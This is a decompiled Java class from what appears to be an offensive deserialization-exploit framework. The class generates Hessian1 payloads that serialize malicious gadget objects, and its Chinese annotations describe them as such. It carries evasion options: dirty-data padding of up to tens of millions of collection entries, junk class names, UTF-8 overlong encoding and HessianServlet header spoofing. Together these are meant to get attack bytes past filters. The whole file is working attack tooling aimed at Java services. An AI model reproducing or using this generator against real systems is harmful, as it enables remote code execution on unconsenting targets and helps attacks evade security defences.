/*
 * Decompiled with CFR 0.152.
 */
package com.ar3h.chains.core.payload.impl;

import com.ar3h.chains.common.annotations.PayloadAnnotation;
import com.ar3h.chains.common.param.Choice;
import com.ar3h.chains.common.param.Param;
import com.ar3h.chains.common.param.ParamType;
import com.ar3h.chains.common.util.CommonUtil;
import com.ar3h.chains.core.payload.AbstractHessianPayload;
import com.ar3h.chains.core.payload.enhance.DirtyDataWrapper;
import com.ar3h.chains.core.payload.enhance.Hessian1OutputEnhance;
import com.caucho.hessian.io.HessianInput;
import com.caucho.hessian.io.HessianOutput;
import com.caucho.hessian.io.SerializerFactory;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.nio.file.Files;
import java.nio.file.Paths;
import javax.validation.constraints.Max;
import javax.validation.constraints.Min;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;

@PayloadAnnotation(name="Hessian1\u53cd\u5e8f\u5217\u5316", description="\u4f7f\u7528Hessian1\u7248\u672c\u5bf9\u6076\u610f\u5bf9\u8c61\u8fdb\u884c\u5e8f\u5217\u5316\uff0c\u8fd4\u56de\u5b57\u8282\u6d41", gadgetTags={"HessianDeserialize"}, excludes={"NotForHessian"}, authors={"X1r0z", "Ar3h"}, mode={"Generate"}, priority=10)
public class HessianPayload
extends AbstractHessianPayload {
    private static final Logger log = LoggerFactory.getLogger(HessianPayload.class);
    public Object object;
    @Param(name="\u968f\u673a\u96c6\u5408\u810f\u6570\u636e\u5927\u5c0f", description="\u968f\u673a\u4f7f\u7528 ArrayList/LinkedList/HashMap/LinkedHashMap/TreeMap \u7b49\u96c6\u5408\u7c7b\u578b\u6765\u5c01\u88c5 object\uff0c\u5e76\u6307\u5b9a\u810f\u6570\u636e\u5927\u5c0f\n\u63a8\u8350\u4f7f\u7528\u8be5\u6df7\u6dc6\n\u53c2\u8003\u6570\u636e\uff1a1\u5343\u4e07\u810f\u6570\u636e\u9700\u89812\u79d2, \u53ef\u751f\u6210 43MB Payload", type=ParamType.Integer)
    @Min(value=0L)
    @Max(value=30000000L)
    public @Min(value=0L) @Max(value=30000000L) int dirtyCollectionSize = 0;
    @Param(name="\u586b\u5145\u5783\u573e\u7c7b\u7684\u6570\u91cf", description="\u4f7f\u7528 LinkedList \u5305\u88c5\u968f\u673a\u5783\u573e\u7c7b\u540d\u6765\u5c01\u88c5 object\n\u751f\u6210\u901f\u5ea6\u6781\u6162\uff0c\u4e0d\u5efa\u8bae\u8bbe\u7f6e\u8d85\u8fc710w\n\u53c2\u8003\u6570\u636e\uff1a10w\u810f\u6570\u636e\u9700\u89818\u79d2, \u53ef\u751f\u6210 2.5MB Payload\n\u6b64\u9009\u9879\u5728HessianServlet\u4e2d\u6d4b\u8bd5\u5b58\u5728\u95ee\u9898")
    @Min(value=0L)
    @Max(value=100000L)
    public @Min(value=0L) @Max(value=100000L) int dirtyClassSize = 0;
    @Param(name="Utf8OverlongEncoding", description="0: \u4e0d\u5f00\u542f\n1: \u968f\u673a\u5e73\u5747\u6df7\u54082\u30013 utf8 overlong encoding\n2: \u7eaf2\u5b57\u8282 utf8 overlong encoding\n3: \u7eaf3\u5b57\u8282 utf8 overlong encoding", type=ParamType.Choice, choices={@Choice(value="0", label="\u4e0d\u5f00\u542f utf8 overlong encoding"), @Choice(value="1", label="\u968f\u673a\u5e73\u5747\u6df7\u54082\u30013 utf8 overlong encoding"), @Choice(value="2", label="\u7eaf2\u5b57\u8282 utf8 overlong encoding"), @Choice(value="3", label="\u7eaf3\u5b57\u8282 utf8 overlong encoding")})
    public String overlongMode = "0";
    @Param(name="\u542f\u7528HessianServlet\u683c\u5f0f\u5e76\u8bbe\u7f6eheader\u957f\u5ea6", description="\u5728\u539f\u6765\u7684Hessian Payload\u57fa\u7840\u4e0a\u52a0\u7279\u6b8a\u7684header\u5934\uff0c\u4f7f\u5176\u7b26\u5408HessianServlet\u683c\u5f0f\uff0c\u5e76\u6307\u5b9aheaderName\u957f\u5ea6\n\u6ce8\u610f\u6700\u5927\u957f\u5ea6\u4ec5\u652f\u630165535\uff0c\u56e0\u4e3a\u957f\u5ea6\u7531\u4e24\u4e2a\u5b57\u8282\u63a7\u5236")
    @Min(value=0L)
    @Max(value=65535L)
    public @Min(value=0L) @Max(value=65535L) int servletHeaderLen = 0;

    @Override
    public byte[] marshal(Object obj) throws Exception {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        HessianOutput out = new HessianOutput((OutputStream)bos);
        Object objWraped = DirtyDataWrapper.builder(obj).withDirtyCollectionSize(this.dirtyCollectionSize).withDirtyClassSize(this.dirtyClassSize).build();
        int overlongMode = Integer.parseInt(this.overlongMode);
        if (overlongMode > 0) {
            log.info("Enable Hessian1 utf8overlong, overlongMode: {}", (Object)overlongMode);
            out = Hessian1OutputEnhance.getHessian1Output(bos, overlongMode);
        }
        AbstractHessianPayload.NoWriteReplaceSerializerFactory sf = new AbstractHessianPayload.NoWriteReplaceSerializerFactory();
        sf.setAllowNonSerializable(true);
        out.setSerializerFactory((SerializerFactory)sf);
        out.writeObject(objWraped);
        out.close();
        byte[] byteArray = bos.toByteArray();
        if (this.servletHeaderLen > 0) {
            log.info("Enable HessianServlet Format");
            byteArray = this.appendHessian1Header(byteArray, this.servletHeaderLen);
        }
        return byteArray;
    }

    @Override
    public Object unmarshal(byte[] data) throws Exception {
        return HessianPayload.deserialize(data);
    }

    public static byte[] serialize(Object obj) throws Exception {
        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        HessianOutput hessianOutput = new HessianOutput((OutputStream)byteArrayOutputStream);
        AbstractHessianPayload.NoWriteReplaceSerializerFactory sf = new AbstractHessianPayload.NoWriteReplaceSerializerFactory();
        sf.setAllowNonSerializable(true);
        hessianOutput.setSerializerFactory((SerializerFactory)sf);
        hessianOutput.writeObject(obj);
        hessianOutput.close();
        byteArrayOutputStream.close();
        return byteArrayOutputStream.toByteArray();
    }

    public static Object deserializeFromFile(String file) throws IOException {
        byte[] bytes = Files.readAllBytes(Paths.get(file, new String[0]));
        return HessianPayload.deserialize(bytes);
    }

    public static Object deserialize(byte[] data) throws IOException {
        ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(data);
        HessianInput hessianInput = new HessianInput((InputStream)byteArrayInputStream);
        Object obj = hessianInput.readObject();
        hessianInput.close();
        byteArrayInputStream.close();
        return obj;
    }

    public byte[] appendHessian1Header(byte[] payload, int headerNameLen) throws IOException {
        ByteArrayOutputStream stream = new ByteArrayOutputStream();
        stream.write(99);
        stream.write(2);
        stream.write(0);
        stream.write(72);
        String headerName = CommonUtil.getRandomString(headerNameLen);
        int len = headerName.length();
        stream.write(len >> 8);
        stream.write(len);
        stream.write(headerName.getBytes());
        stream.write(payload);
        return stream.toByteArray();
    }

    public Object getObject() {
        return this.object;
    }
}

